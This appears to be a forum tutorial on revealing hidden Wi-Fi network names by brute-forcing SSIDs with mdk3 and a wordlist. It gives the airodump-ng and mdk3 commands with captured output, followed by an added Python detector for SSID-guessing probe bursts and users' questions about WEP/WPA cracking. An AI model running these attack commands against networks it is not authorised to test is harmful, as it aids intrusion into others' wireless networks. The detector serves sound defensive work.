How to Brute-Force a Hidden ESSID Using MDK3
One of MDK3's best features is brute-forcing hidden ESSIDs. It works in two ways: either we can try every possible combination, which is suitable for short ESSIDs, or we can try using a default/custom-created ESSID list. I have attached the Shmoo Group's WPA Tables ESSID list with the addition of some more default ESSIDs which I got from different forums, so now there are approx. 1143 ESSIDs. Using MDK3, within a few seconds you can get the hidden ESSIDs.
I have set an 11-character ESSID and set it to hidden.
Tested using a Linksys WUSB54GC adapter and a Linksys WRT54G router.
Commands:
bt ~ # airodump-ng rausb0
Open one more window:
# If the command is supplied without the target -t parameter, it will brute-force all hidden ESSIDs in range.
bt ~ # mdk3 rausb0 p -f SSID.txt -t 00:21:29:68:16:C2
SSID Wordlist Mode activated!
Waiting for beacon frame from target...
Sniffer thread started
SSID is hidden. SSID Length is: 11.
Trying SSID: linksys
Trying SSID: ascend
Trying SSID: <any ssid>
Trying SSID: mynetwork
Trying SSID: fatport
Trying SSID: 2WIRE975
Trying SSID: 2WIRE186
Trying SSID: 2WIRE707
Trying SSID: 2WIRE774
Trying SSID: 2WIRE436
Packets sent: 1143 - Speed: 120 packets/sec
Got response from 00:21:29:68:16:C2, SSID: "thunderbolt"
Here you got the hidden ESSID in less than 10 seconds. By default its speed is 300 pps. In the airodump-ng window you can see that the hidden ESSID <length: 11> has now changed to your ESSID, e.g. thunderbolt.
Download ESSID File
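From the defender's side, the wordlist run above is visible in the air as one source MAC sending directed probe requests for many different SSIDs to a single BSSID at over a hundred frames per second, which is what a wireless IDS can key on. The following Python detector is an added example, not code from the post or from MDK3; the probe records, the MAC addresses and the thresholds are constructed for illustration, and only the target BSSID is taken from the post.

```python
from collections import defaultdict

# Constructed sample probe-request records: (time_s, source_mac, bssid, ssid).
# The MACs and SSIDs below are made up; the BSSID is the one from the post.
ATTACKER = "02:00:00:00:00:aa"
CLIENT = "02:00:00:00:00:bb"
TARGET_BSSID = "00:21:29:68:16:c2"

def build_sample():
    records = []
    # A normal client re-probing its three saved networks over ten seconds.
    for i in range(30):
        records.append((i * 0.33, CLIENT, TARGET_BSSID, ["home", "office", "cafe"][i % 3]))
    # One source walking a wordlist against one BSSID at ~120 probes/sec.
    for i in range(60):
        records.append((2.0 + i / 120.0, ATTACKER, TARGET_BSSID, f"guess{i:03d}"))
    return records

def detect_ssid_guessing(records, window_s=1.0, threshold=20):
    """Flag (source, bssid) pairs that probe for at least `threshold` distinct
    SSIDs inside any sliding window of `window_s` seconds.
    Returns {(src, bssid): (max_distinct_ssids, probes_per_sec)}."""
    by_pair = defaultdict(list)
    for ts, src, bssid, ssid in sorted(records):
        by_pair[(src, bssid)].append((ts, ssid))
    alerts = {}
    for pair, events in by_pair.items():
        start = 0
        for end in range(len(events)):
            # Advance the window start so the window spans at most window_s.
            while events[end][0] - events[start][0] > window_s:
                start += 1
            distinct = len({ssid for _, ssid in events[start:end + 1]})
            if distinct >= threshold:
                span = events[end][0] - events[start][0]
                rate = (end - start + 1) / span if span > 0 else float("inf")
                best = alerts.get(pair, (0, 0.0))
                if distinct > best[0]:
                    alerts[pair] = (distinct, rate)
    return alerts

if __name__ == "__main__":
    for (src, bssid), (n, pps) in detect_ssid_guessing(build_sample()).items():
        print(f"ALERT {src} -> {bssid}: {n} distinct SSIDs probed at ~{pps:.0f}/s")
```

The benign client never exceeds three distinct SSIDs and is not reported, while the wordlist source is reported with 60 distinct SSIDs at roughly 122 probes per second.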
Is it possible to crack a hidden ESSID without using a wordlist?
Hi my senior secure_it, may I ask you, is it possible to crack a hidden ESSID without using a wordlist (dictionary list)? Like cracking a WEP password: just capture enough IVs, then you can easily crack that password without having any wordlist, because if the hidden ESSID uses a word that is very difficult to guess (not a dictionary word), then our wordlist doesn't have this word and cannot crack it. And WPA security, is it also the same, must it be cracked using a wordlist, not like WEP where you just capture enough IVs and then it can be cracked? Thank you.
How to intercept it in clear text once a client connects to the AP using a valid ESSID
Hi my senior Tron, thank you for your reply. May I ask you, if that AP's ESSID is hidden, then once a client connects to that AP using a valid ESSID, that is a GOOD chance to crack this hidden ESSID. Using what tools? How to do it? Is it just using the command: airodump-ng -w myfile -c 6 rausb0, and then the hidden ESSID will appear on the airodump-ng screen? Thank you very much.